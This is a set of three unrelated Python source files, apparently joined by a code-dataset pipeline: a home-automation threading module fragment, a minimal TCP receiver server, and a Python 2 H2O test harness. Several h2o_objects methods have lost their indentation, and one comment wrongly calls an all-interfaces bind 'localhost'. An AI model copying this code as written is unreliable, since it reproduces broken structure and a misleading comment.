            if warning_step >= self.AD.qsize_warning_step:
                warning_step = 0
        else:
            warning_step = 0
            warning_iterations = 0
        return warning_step, warning_iterations

    async def update_thread_info(self, thread_id, callback, app, type, uuid):
        """Record a callback starting ('callback') or finishing ('idle') on a thread.

        Updates busy counters, per-app/per-callback stats and the thread's
        admin entity.
        """
        self.logger.debug("Update thread info: %s", thread_id)
        if self.AD.log_thread_actions:
            if callback == "idle":
                self.diag.info(
                    "%s done", thread_id)
            else:
                self.diag.info(
                    "%s calling %s callback %s", thread_id, type, callback)
        now = await self.AD.sched.get_now()
        if callback == "idle":
            start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
            if self.AD.sched.realtime is True and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold:
                self.logger.warning("callback %s has now completed", await self.get_state("_threading", "admin", "thread.{}".format(thread_id)))
            await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
            await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
            await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1)
            await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
            self.current_callbacks_executed += 1
        else:
            await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
            self.current_callbacks_fired += 1
        current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
        max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
        if current_busy > max_busy:
            await self.set_state("_threading", "admin", "sensor.threads_max_busy", state=current_busy)
            await self.set_state("_threading", "admin", "sensor.threads_max_busy_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
        await self.set_state("_threading", "admin", "sensor.threads_last_action_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
        # Update thread info
        if thread_id == "async":
            await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
                                 q=0,
                                 state=callback,
                                 time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
                                 is_alive=True,
                                 pinned_apps=[]
                                 )
        else:
            await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
                                 q=self.threads[thread_id]["queue"].qsize(),
                                 state=callback,
                                 time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
                                 is_alive=self.threads[thread_id]["thread"].is_alive(),
                                 pinned_apps=await self.get_pinned_apps(thread_id)
                                 )
        await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)

    #
    # Pinning
    #

    async def add_thread(self, silent=False, pinthread=False, id=None):
        """Start a new worker thread, or restart a dead one when *id* is given."""
        if id is None:
            tid = self.thread_count
        else:
            tid = id
        if silent is False:
            self.logger.info("Adding thread %s", tid)
        t = threading.Thread(target=self.worker)
        t.daemon = True
        name = "thread-{}".format(tid)
        # Thread.setName() is deprecated; assign the name attribute directly.
        t.name = name
        if id is None:
            await self.add_entity("admin", "thread.{}".format(name), "idle",
                                  {
                                      "q": 0,
                                      "is_alive": True,
                                      "time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
                                  }
                                  )
            self.threads[name] = {}
            self.threads[name]["queue"] = Queue(maxsize=0)
            t.start()
            self.thread_count += 1
            if pinthread is True:
                self.pin_threads += 1
        else:
            # restart: the entity and queue already exist
            await self.set_state("_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True)
        self.threads[name]["thread"] = t

    async def calculate_pin_threads(self):
        """Assign pin threads to pinned apps, balancing load across pins."""
        if self.pin_threads == 0:
            return
        thread_pins = [0] * self.pin_threads
        for name in self.AD.app_management.objects:
            # Looking for apps that already have a thread pin value
            if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
                thread = await self.get_pin_thread(name)
                if thread >= self.thread_count:
                    raise ValueError("Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'")
                # Ignore anything outside the pin range as it will have been set by the user
                if thread < self.pin_threads:
                    thread_pins[thread] += 1
        # Now we know the numbers, go fill in the gaps
        for name in self.AD.app_management.objects:
            if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
                thread = thread_pins.index(min(thread_pins))
                await self.set_pin_thread(name, thread)
                thread_pins[thread] += 1
        for thread in self.threads:
            pinned_apps = await self.get_pinned_apps(thread)
            await self.set_state("_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps)

    def app_should_be_pinned(self, name):
        """Return whether app *name* should be pinned (apps.yaml overrides global)."""
        # Check apps.yaml first - allow override
        app = self.AD.app_management.app_config[name]
        if "pin_app" in app:
            return app["pin_app"]
        # if not, go with the global default
        return self.pin_apps

    async def get_app_pin(self, name):
        """Return the app's pin_app flag."""
        return self.AD.app_management.objects[name]["pin_app"]

    async def set_app_pin(self, name, pin):
        """Set the app's pin_app flag, allocating a pin thread if needed."""
        self.AD.app_management.objects[name]["pin_app"] = pin
        if pin is True:
            # May need to set this app up with a pinned thread
            await self.calculate_pin_threads()

    async def get_pin_thread(self, name):
        """Return the app's pinned thread index (-1 = unassigned)."""
        return self.AD.app_management.objects[name]["pin_thread"]

    async def set_pin_thread(self, name, thread):
        """Pin app *name* to thread index *thread*."""
        self.AD.app_management.objects[name]["pin_thread"] = thread

    def validate_pin(self, name, kwargs):
        """Return False (and warn) if kwargs carries an out-of-range pin_thread."""
        valid = True
        if "pin_thread" in kwargs:
            if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
                self.logger.warning("Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name)
                valid = False
        return valid

    async def get_pinned_apps(self, thread):
        """Return the list of app names pinned to the given thread ('thread-N')."""
        id = int(thread.split("-")[1])
        apps = []
        for obj in self.AD.app_management.objects:
            if self.AD.app_management.objects[obj]["pin_thread"] == id:
                apps.append(obj)
        return apps

    #
    # Constraints
    #

    async def check_constraint(self, key, value, app):
        """Run the app-defined constraint *key* (if registered) and return its result."""
        unconstrained = True
        if key in app.list_constraints():
            method = getattr(app, key)
            unconstrained = await utils.run_in_executor(self, method, value)
        return unconstrained

    async def check_time_constraint(self, args, name):
        """Return False if now is outside constrain_start_time/constrain_end_time."""
        unconstrained = True
        if "constrain_start_time" in args or "constrain_end_time" in args:
            if "constrain_start_time" not in args:
                start_time = "00:00:00"
            else:
                start_time = args["constrain_start_time"]
            if "constrain_end_time" not in args:
                end_time = "23:59:59"
            else:
                end_time = args["constrain_end_time"]
            if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
                unconstrained = False
        return unconstrained

    async def check_days_constraint(self, args, name):
        """Return False if today's weekday is not listed in constrain_days."""
        unconstrained = True
        if "constrain_days" in args:
            days = args["constrain_days"]
            now = await self.AD.sched.get_now()
            daylist = []
            for day in days.split(","):
                daylist.append(await utils.run_in_executor(self, utils.day_of_week, day))
            if now.weekday() not in daylist:
                unconstrained = False
        return unconstrained

    #
    # Workers
    #

    async def check_and_dispatch_state(self, name, funcref, entity, attribute, new_state,
                                       old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread):
        """Decide whether a state change should fire the callback and dispatch it.

        Handles the attribute="all" fast path, old/new value extraction,
        cold/cnew filtering and the optional 'duration' delayed dispatch.
        Returns True if a callback was actually dispatched.
        """
        executed = False
        #kwargs["handle"] = uuid_
        if attribute == "all":
            executed = await self.dispatch_worker(name, {
                "id": uuid_,
                "name": name,
                "objectid": self.AD.app_management.objects[name]["id"],
                "type": "state",
                "function": funcref,
                "attribute": attribute,
                "entity": entity,
                "new_state": new_state,
                "old_state": old_state,
                "pin_app": pin_app,
                "pin_thread": pin_thread,
                "kwargs": kwargs,
            })
        else:
            #
            # Let's figure out if we need to run a callback
            #
            # Start by figuring out what the incoming old value was
            #
            if old_state is None:
                old = None
            else:
                if attribute in old_state:
                    old = old_state[attribute]
                elif 'attributes' in old_state and attribute in old_state['attributes']:
                    old = old_state['attributes'][attribute]
                else:
                    old = None
            #
            # Now the incoming new value
            #
            if new_state is None:
                new = None
            else:
                if attribute in new_state:
                    new = new_state[attribute]
                elif 'attributes' in new_state and attribute in new_state['attributes']:
                    new = new_state['attributes'][attribute]
                else:
                    new = None
            #
            # Don't do anything unless there has been a change
            #
            if new != old:
                if "__duration" in kwargs:
                    #
                    # We have a pending timer for this, but we are coming around again.
                    # Either we will start a new timer if the conditions are met
                    # Or we won't if they are not.
                    # Either way, we cancel the old timer
                    #
                    await self.AD.sched.cancel_timer(name, kwargs["__duration"])
                #
                # Check if we care about the change
                #
                if (cold is None or cold == old) and (cnew is None or cnew == new):
                    #
                    # We do!
                    #
                    if "duration" in kwargs:
                        #
                        # Set a timer
                        #
                        exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
                        #
                        # If it's a oneshot, scheduler will delete the callback once it has executed,
                        # We need to give it the handle so it knows what to delete
                        #
                        if kwargs.get("oneshot", False):
                            kwargs["__handle"] = uuid_
                        #
                        # We're not executing the callback immediately so let's schedule it
                        # Unless we intercede and cancel it, the callback will happen in "duration" seconds
                        #
                        kwargs["__duration"] = await self.AD.sched.insert_schedule(
                            name, exec_time, funcref, False, None,
                            __entity=entity,
                            __attribute=attribute,
                            __old_state=old,
                            __new_state=new, **kwargs
                        )
                    else:
                        #
                        # Not a delay so make the callback immediately
                        #
                        executed = await self.dispatch_worker(name, {
                            "id": uuid_,
                            "name": name,
                            "objectid": self.AD.app_management.objects[name]["id"],
                            "type": "state",
                            "function": funcref,
                            "attribute": attribute,
                            "entity": entity,
                            "new_state": new,
                            "old_state": old,
                            "pin_app": pin_app,
                            "pin_thread": pin_thread,
                            "kwargs": kwargs
                        })
        return executed

    async def dispatch_worker(self, name, args):
        """Check app- and callback-level constraints, then queue the callback.

        Async callbacks are scheduled on the event loop; sync ones are
        enqueued on a worker thread.  Returns True if dispatched.
        """
        unconstrained = True
        #
        # Argument Constraints
        #
        for arg in self.AD.app_management.app_config[name].keys():
            constrained = await self.check_constraint(arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"])
            if not constrained:
                unconstrained = False
        if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
            unconstrained = False
        elif not await self.check_days_constraint(self.AD.app_management.app_config[name], name):
            unconstrained = False
        #
        # Callback level constraints
        #
        myargs = utils.deepcopy(args)
        if "kwargs" in myargs:
            for arg in myargs["kwargs"].keys():
                constrained = await self.check_constraint(arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"])
                if not constrained:
                    unconstrained = False
            if not await self.check_time_constraint(myargs["kwargs"], name):
                unconstrained = False
            elif not await self.check_days_constraint(myargs["kwargs"], name):
                unconstrained = False
        if unconstrained:
            #
            # It's going to happen
            #
            await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
            await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1)
            #
            # And Q
            #
            if asyncio.iscoroutinefunction(myargs["function"]):
                f = asyncio.ensure_future(self.async_worker(myargs))
                self.AD.futures.add_future(name, f)
            else:
                self.select_q(myargs)
            return True
        else:
            return False

    # noinspection PyBroadException
    async def async_worker(self, args):
        """Execute an async app callback directly on the event loop."""
        thread_id = threading.current_thread().name
        _type = args["type"]
        funcref = args["function"]
        _id = args["id"]
        objectid = args["objectid"]
        name = args["name"]
        error_logger = logging.getLogger("Error.{}".format(name))
        args["kwargs"]["__thread_id"] = thread_id
        callback = "{}() in {}".format(funcref.__name__, name)
        app = await self.AD.app_management.get_app_instance(name, objectid)
        if app is not None:
            try:
                if _type == "scheduler":
                    try:
                        await self.update_thread_info("async", callback, name, _type, _id)
                        await funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
                    except TypeError:
                        self.report_callback_sig(name, "scheduler", funcref, args)
                elif _type == "state":
                    try:
                        entity = args["entity"]
                        attr = args["attribute"]
                        old_state = args["old_state"]
                        new_state = args["new_state"]
                        await self.update_thread_info("async", callback, name, _type, _id)
                        await funcref(entity, attr, old_state, new_state, self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
                    except TypeError:
                        self.report_callback_sig(name, "state", funcref, args)
                elif _type == "event":
                    data = args["data"]
                    if args["event"] == "__AD_LOG_EVENT":
                        try:
                            await self.update_thread_info("async", callback, name, _type, _id)
                            await funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
                        except TypeError:
                            self.report_callback_sig(name, "log_event", funcref, args)
                    else:
                        try:
                            await self.update_thread_info("async", callback, name, _type, _id)
                            await funcref(args["event"], data, args["kwargs"])
                        except TypeError:
                            self.report_callback_sig(name, "event", funcref, args)
            except Exception:
                error_logger.warning('-' * 60)
                error_logger.warning("Unexpected error in worker for App %s:", name)
                error_logger.warning("Worker Args: %s", args)
                error_logger.warning('-' * 60)
                error_logger.warning(traceback.format_exc())
                error_logger.warning('-' * 60)
                if self.AD.logging.separate_error_log() is True:
                    self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
            # always mark the async "thread" idle again
            await self.update_thread_info("async", "idle", name, _type, _id)
        else:
            if not self.AD.stopping:
                self.logger.warning("Found stale callback for %s - discarding", name)

    # noinspection PyBroadException
    def worker(self):
        """Worker-thread main loop: pull callbacks off this thread's queue and run them."""
        thread_id = threading.current_thread().name
        q = self.get_q(thread_id)
        while True:
            args = q.get()
            _type = args["type"]
            funcref = args["function"]
            _id = args["id"]
            objectid = args["objectid"]
            name = args["name"]
            error_logger = logging.getLogger("Error.{}".format(name))
            args["kwargs"]["__thread_id"] = thread_id
            callback = "{}() in {}".format(funcref.__name__, name)
            app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
            if app is not None:
                try:
                    if _type == "scheduler":
                        try:
                            utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                            funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
                        except TypeError:
                            self.report_callback_sig(name, "scheduler", funcref, args)
                    elif _type == "state":
                        try:
                            entity = args["entity"]
                            attr = args["attribute"]
                            old_state = args["old_state"]
                            new_state = args["new_state"]
                            utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                            funcref(entity, attr, old_state, new_state,
                                    self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
                        except TypeError:
                            self.report_callback_sig(name, "state", funcref, args)
                    elif _type == "event":
                        data = args["data"]
                        if args["event"] == "__AD_LOG_EVENT":
                            try:
                                utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                                funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
                            except TypeError:
                                self.report_callback_sig(name, "log_event", funcref, args)
                        else:
                            try:
                                utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                                funcref(args["event"], data, args["kwargs"])
                            except TypeError:
                                self.report_callback_sig(name, "event", funcref, args)
                except Exception:
                    error_logger.warning('-' * 60)
                    error_logger.warning("Unexpected error in worker for App %s:", name)
                    error_logger.warning("Worker Args: %s", args)
                    error_logger.warning('-' * 60)
                    error_logger.warning(traceback.format_exc())
                    error_logger.warning('-' * 60)
                    if self.AD.logging.separate_error_log() is True:
                        self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
                finally:
                    utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, "idle", name, _type, _id))
            else:
                if not self.AD.stopping:
                    self.logger.warning("Found stale callback for %s - discarding", name)
            q.task_done()

    def report_callback_sig(self, name, type, funcref, args):
        """Log a diagnostic when a callback's signature doesn't match its type."""
        callback_args = {
            "scheduler": {"count": 1, "signature": "f(self, kwargs)"},
            "state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
            "event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
            "log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
            "initialize": {"count": 0, "signature": "initialize()"},
            "terminate": {"count": 0, "signature": "terminate()"}
        }
        sig = inspect.signature(funcref)
        if type in callback_args:
            if len(sig.parameters) != callback_args[type]["count"]:
                self.logger.warning("Suspect incorrect signature type for callback %s() in %s, should be %s - discarding", funcref.__name__, name, callback_args[type]["signature"])
                error_logger = logging.getLogger("Error.{}".format(name))
                error_logger.warning('-' * 60)
                error_logger.warning("Unexpected error in worker for App %s:", name)
                error_logger.warning("Worker Args: %s", args)
                error_logger.warning('-' * 60)
                error_logger.warning(traceback.format_exc())
                error_logger.warning('-' * 60)
                if self.AD.logging.separate_error_log() is True:
                    self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
        else:
            self.logger.error("Unknown callback type: %s", type)
|
recv_t.py | import time
import socket
import sys
# import rospy
import traceback
from threading import Thread
def client_thread(conn):
    """Receive a single message (up to 1024 bytes) from *conn*, print it,
    then close the connection.

    Removed the dead `is_active` flag that was set and never read.
    """
    data = conn.recv(1024)
    print(data)
    conn.close()
def start_server():
    """Listen for TCP connections on port 4000 and spawn a thread per client."""
    # rospy.init_node("receiver")  # initial ros node
    HOST = ''    # Standard loopback interface address (localhost)
    PORT = 4000  # Port to listen on (non-privileged ports are > 1023)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Bind socket to local host and port
    try:
        s.bind((HOST, PORT))
    except socket.error as msg:
        # BUG FIX: the old message had one %s placeholder for a two-value
        # tuple (TypeError), and msg[0]/msg[1] indexing fails on Python 3
        # where socket.error is OSError.
        print("Bind failed. Error: %s" % msg)
        sys.exit()
    s.listen(1000)
    while True:
        conn, addr = s.accept()
        try:
            Thread(target=client_thread, args=[conn]).start()
        except Exception:
            print("Thread did not start.")
            traceback.print_exc()
    s.close()  # NOTE(review): unreachable - the accept loop never exits
def main():
    """Entry point: run the receiver server until interrupted."""
    start_server()


if __name__ == "__main__":
    main()
|
h2o_objects.py | import sys, getpass, os, psutil, time, requests, errno, threading, inspect, shlex
import h2o_os_util, h2o_print as h2p, h2o_args
import h2o_nodes
from h2o_test import \
tmp_dir, tmp_file, flatfile_pathname, spawn_cmd, find_file, verboseprint, \
dump_json, log, check_sandbox_for_errors
import json, platform, re
from h2o_test import dump_json
# print "h2o_objects"
# used to drain stdout on the h2o objects below (before terminating a node)
def __drain(src, dst):
    """Copy all lines from *src* to *dst*, then close *src*.

    *dst* may be an OS-level file descriptor (int) or a file-like object;
    an int destination is also closed when the source is exhausted.
    """
    for l in src:
        if isinstance(dst, int):  # idiom fix: was type(dst) == type(0)
            # got this with random data to parse.. why? it shows up in our stdout?
            # UnicodeEncodeError: 'ascii' codec can't encode character u'\x86' in position 60:
            # ordinal not in range(128)
            # could we be getting unicode object?
            try:
                os.write(dst, l)
            except Exception:
                # os.write(dst,"kbn: non-ascii char in the next line?")
                os.write(dst, l.encode('utf8'))
        else:
            # FIX! this case probably can have the same issue?
            dst.write(l)
            dst.flush()
    src.close()
    if isinstance(dst, int):
        os.close(dst)
def drain(src, dst):
    """Pump *src* into *dst* on a background daemon thread and return immediately."""
    pump = threading.Thread(target=__drain, args=(src, dst), daemon=True)
    pump.start()
#*****************************************************************
class H2O(object):
    def __init__(self,
            use_this_ip_addr=None, port=54321, capture_output=True,
            force_ip=False, network=None,
            use_debugger=None, classpath=None,
            use_hdfs=False, use_maprfs=False,
            hdfs_version=None, hdfs_name_node=None, hdfs_config=None,
            aws_credentials=None,
            use_flatfile=False, java_heap_GB=None, java_heap_MB=None, java_extra_args=None,
            use_home_for_ice=False, node_id=None, username=None,
            random_udp_drop=False, force_tcp=False,
            redirect_import_folder_to_s3_path=None,
            redirect_import_folder_to_s3n_path=None,
            disable_h2o_log=False,
            enable_benchmark_log=False,
            h2o_remote_buckets_root=None,
            delete_keys_at_teardown=False,
            cloud_name=None,
            disable_assertions=None,
            sandbox_ignore_errors=False,
    ):
        '''Capture launch configuration for one h2o node.

        Only records state; the actual jvm launch happens in the subclasses
        (LocalH2O / RemoteH2O). Command-line args in h2o_args override the
        ip/network parameters passed here.
        '''
        if use_hdfs:
            # see if we can touch a 0xdata machine
            try:
                # long timeout in ec2...bad
                a = requests.get('http://172.16.2.176:80', timeout=1)
                hdfs_0xdata_visible = True
            except:
                hdfs_0xdata_visible = False
            # different defaults, depending on where we're running
            if hdfs_name_node is None:
                if hdfs_0xdata_visible:
                    hdfs_name_node = "172.16.2.176"
                else:  # ec2
                    hdfs_name_node = "10.78.14.235:9000"
            if hdfs_version is None:
                if hdfs_0xdata_visible:
                    hdfs_version = "cdh4"
                else:  # ec2
                    hdfs_version = "0.20.2"
        self.redirect_import_folder_to_s3_path = redirect_import_folder_to_s3_path
        self.redirect_import_folder_to_s3n_path = redirect_import_folder_to_s3n_path
        self.aws_credentials = aws_credentials
        self.port = port
        # None is legal for self.h2o_addr.
        # means we won't give an ip to the jar when we start.
        # Or we can say use use_this_ip_addr=127.0.0.1, or the known address
        # if use_this_addr is None, use 127.0.0.1 for urls and json
        # Command line arg 'ip_from_cmd_line' dominates:
        # ip_from_cmd_line and use_this_ip_addr shouldn't be used for mutli-node
        if h2o_args.ip_from_cmd_line:
            self.h2o_addr = h2o_args.ip_from_cmd_line
        else:
            self.h2o_addr = use_this_ip_addr
        # force_ip is implied whenever an explicit address was supplied
        self.force_ip = force_ip or (self.h2o_addr!=None)
        if self.h2o_addr:
            self.http_addr = self.h2o_addr
        else:
            self.http_addr = h2o_args.python_cmd_ip
        if h2o_args.network_from_cmd_line:
            self.network = h2o_args.network_from_cmd_line
        else:
            self.network = network
        # command line should always dominate for enabling
        if h2o_args.debugger: use_debugger = True
        self.use_debugger = use_debugger
        self.classpath = classpath
        self.capture_output = capture_output
        self.use_hdfs = use_hdfs
        self.use_maprfs = use_maprfs
        self.hdfs_name_node = hdfs_name_node
        self.hdfs_version = hdfs_version
        self.hdfs_config = hdfs_config
        self.use_flatfile = use_flatfile
        self.java_heap_GB = java_heap_GB
        self.java_heap_MB = java_heap_MB
        self.java_extra_args = java_extra_args
        self.use_home_for_ice = use_home_for_ice
        self.node_id = node_id
        if username:
            self.username = username
        else:
            self.username = getpass.getuser()
        # don't want multiple reports from tearDown and tearDownClass
        # have nodes[0] remember (0 always exists)
        self.sandbox_error_was_reported = False
        self.sandbox_ignore_errors = sandbox_ignore_errors
        self.random_udp_drop = random_udp_drop
        self.force_tcp = force_tcp
        self.disable_h2o_log = disable_h2o_log
        # this dumps stats from tests, and perf stats while polling to benchmark.log
        self.enable_benchmark_log = enable_benchmark_log
        self.h2o_remote_buckets_root = h2o_remote_buckets_root
        self.delete_keys_at_teardown = delete_keys_at_teardown
        self.disable_assertions = disable_assertions
        if cloud_name:
            self.cloud_name = cloud_name
        else:
            # default cloud name is unique per user+process so parallel runs don't join up
            self.cloud_name = 'pytest-%s-%s' % (getpass.getuser(), os.getpid())
def __str__(self):
return '%s - http://%s:%d/' % (type(self), self.http_addr, self.port)
def url(self, loc, port=None):
# always use the new api port
if port is None: port = self.port
if loc.startswith('/'):
delim = ''
else:
delim = '/'
u = 'http://%s:%d%s%s' % (self.http_addr, port, delim, loc)
return u
    def do_json_request(self, jsonRequest=None, fullUrl=None, timeout=10, params=None, postData=None, returnFast=False,
                        cmd='get', extraComment=None, ignoreH2oError=False, noExtraErrorCheck=False, **kwargs):
        '''Issue one HTTP request against this node and return the parsed json.

        jsonRequest  -- location appended to this node's base url (ignored if fullUrl given)
        cmd          -- 'get', 'post' or 'delete'
        returnFast   -- skip json decoding entirely and return None
        ignoreH2oError -- print (but do not raise on) an "error" field in the response
        noExtraErrorCheck -- suppress the sandbox log scan on a connection error
        Raises on non-json responses and (unless ignored) on h2o-reported errors.
        '''
        # if url param is used, use it as full url. otherwise crate from the jsonRequest
        if fullUrl:
            url = fullUrl
        else:
            url = self.url(jsonRequest)
        # remove any params that are 'None'
        # need to copy dictionary, since can't delete while iterating
        if params is not None:
            params2 = params.copy()
            for k in params2:
                if params2[k] is None:
                    del params[k]
            paramsStr = '?' + '&'.join(['%s=%s' % (k, v) for (k, v) in params.items()])
        else:
            paramsStr = ''
        # log the POST body alongside the url so failures are reproducible
        extraComment2 = " " + repr(postData)+";" if cmd=='post' else ""
        extraComment2 += extraComment if extraComment else ""
        if len(extraComment2) > 0:
            log('Start ' + url + paramsStr, comment=extraComment2)
        else:
            log('Start ' + url + paramsStr)
        # file get passed thru kwargs here
        if h2o_args.no_timeout:
            timeout = None  # infinite
        try:
            if 'post' == cmd:
                # NOTE == cmd: for now, since we don't have deserialization from JSON in h2o-dev, we use form-encoded POST.
                # This is temporary.
                #
                # This following does application/json (aka, posting JSON in the body):
                # r = requests.post(url, timeout=timeout, params=params, data=json.dumps(postData), **kwargs)
                #
                # This does form-encoded, which doesn't allow POST of nested structures
                r = requests.post(url, timeout=timeout, params=params, data=postData, **kwargs)
            elif 'delete' == cmd:
                r = requests.delete(url, timeout=timeout, params=params, **kwargs)
            elif 'get' == cmd:
                r = requests.get(url, timeout=timeout, params=params, **kwargs)
            else:
                raise ValueError("Unknown HTTP command (expected 'get', 'post' or 'delete'): " + cmd)
        except Exception, e:
            # rethrow the exception after we've checked for stack trace from h2o
            # out of memory errors maybe don't show up right away? so we should wait for h2o
            # to get it out to h2o stdout. We don't want to rely on cloud teardown to check
            # because there's no delay, and we don't want to delay all cloud teardowns by waiting.
            exc_info = sys.exc_info()
            # use this to ignore the initial connection errors during build cloud when h2o is coming up
            if not noExtraErrorCheck:
                h2p.red_print(
                    "ERROR: got exception on %s to h2o. \nGoing to check sandbox, then rethrow.." % (url + paramsStr))
                time.sleep(2)
                check_sandbox_for_errors(python_test_name=h2o_args.python_test_name);
            # Python 2 three-arg raise: re-raise with the original traceback
            raise exc_info[1], None, exc_info[2]
        if 200 != r.status_code:
            print "JSON call returned non-200 status with ", (url + paramsStr)
            print "r.status_code: " + str(r.status_code)
            print "r.headers: " + repr(r.headers)
            print "r.text: " + r.text
        # fatal if no response
        # FIX! why is this not working on bad response to GLM
        # if not r:
        #     raise Exception("Maybe bad url? no r in do_json_request in %s:" % inspect.stack()[1][3])
        # this is used to open a browser on results, or to redo the operation in the browser
        # we don't' have that may urls flying around, so let's keep them all
        # FIX! this doesn't work now with all the extra post data required?
        h2o_nodes.json_url_history.append(r.url)
        # if r.json():
        #     raise Exception("Maybe bad url? no r.json in do_json_request in %s:" % inspect.stack()[1][3])
        rjson = None
        if returnFast:
            return
        try:
            # h2o-dev sometimes is returning ISO-8859-2, Latin-2?
            ## print "apparent_coding", r.apparent_encoding
            r.encoding = 'utf-8'
            rjson = r.json()
        except:
            h2p.red_print("r.text:", r.text.encode('utf8'))
            try:
                # try to decode the r.text?
                if not isinstance(json.loads(r.text), (list, dict)):
                    raise Exception("h2o json responses should always be lists or dicts, see previous for text")
            except:
                raise Exception("Could not decode any json from the request %s." % r.text)
        # TODO: we should really only look in the response object. This check
        # prevents us from having a field called "error" (e.g., for a scoring result).
        for e in ['error', 'Error', 'errors', 'Errors']:
            # error can be null (python None). This happens in exec2
            if e in rjson and rjson[e]:
                print "rjson:", dump_json(rjson)
                emsg = 'rjson %s in %s: %s' % (e, inspect.stack()[1][3], rjson[e])
                if ignoreH2oError:
                    # well, we print it..so not totally ignore. test can look at rjson returned
                    print emsg
                else:
                    print emsg
                    raise Exception(emsg)
        for w in ['warning', 'Warning', 'warnings', 'Warnings']:
            # warning can be null (python None).
            if w in rjson and rjson[w]:
                verboseprint(dump_json(rjson))
                print 'rjson %s in %s: %s' % (w, inspect.stack()[1][3], rjson[w])
        return rjson
def stabilize(self, test_func, error, timeoutSecs=10, retryDelaySecs=0.5):
'''Repeatedly test a function waiting for it to return True.
Arguments:
test_func -- A function that will be run repeatedly
error -- A function that will be run to produce an error message
it will be called with (node, timeTakenSecs, numberOfRetries)
OR
-- A string that will be interpolated with a dictionary of
{ 'timeTakenSecs', 'numberOfRetries' }
timeoutSecs -- How long in seconds to keep trying before declaring a failure
retryDelaySecs -- How long to wait between retry attempts
'''
start = time.time()
numberOfRetries = 0
while h2o_args.no_timeout or (time.time() - start < timeoutSecs):
if test_func(self, tries=numberOfRetries, timeoutSecs=timeoutSecs):
break
time.sleep(retryDelaySecs)
numberOfRetries += 1
# hey, check the sandbox if we've been waiting a long time...rather than wait for timeout
# to find the badness?. can check_sandbox_for_errors at any time
if ((numberOfRetries % 50) == 0):
check_sandbox_for_errors(python_test_name=h2o_args.python_test_name)
else:
timeTakenSecs = time.time() - start
if isinstance(error, type('')):
raise Exception('%s failed after %.2f seconds having retried %d times' % (
error, timeTakenSecs, numberOfRetries))
else:
msg = error(self, timeTakenSecs, numberOfRetries)
raise Exception(msg)
    def wait_for_node_to_accept_connections(self, nodeList, timeoutSecs=15, noExtraErrorCheck=False):
        """Block until this node answers get_cloud(), or raise after timeoutSecs."""
        verboseprint("wait_for_node_to_accept_connections")

        # predicate handed to stabilize(): True once a cloud-status request succeeds
        def test(n, tries=None, timeoutSecs=timeoutSecs):
            try:
                n.get_cloud(noExtraErrorCheck=noExtraErrorCheck, timeoutSecs=timeoutSecs)
                return True
            except requests.ConnectionError, e:
                # Now using: requests 1.1.0 (easy_install --upgrade requests) 2/5/13
                # Now: assume all requests.ConnectionErrors are H2O legal connection errors.
                # Have trouble finding where the errno is, fine to assume all are good ones.
                # Timeout check will kick in if continued H2O badness.
                return False

        # get their http addr to represent the nodes
        expectedCloudStr = ",".join([str(n) for n in nodeList])
        self.stabilize(test, error=('waiting for initial connection: Expected cloud %s' % expectedCloudStr),
                       timeoutSecs=timeoutSecs,  # with cold cache's this can be quite slow
                       retryDelaySecs=0.1)  # but normally it is very fast
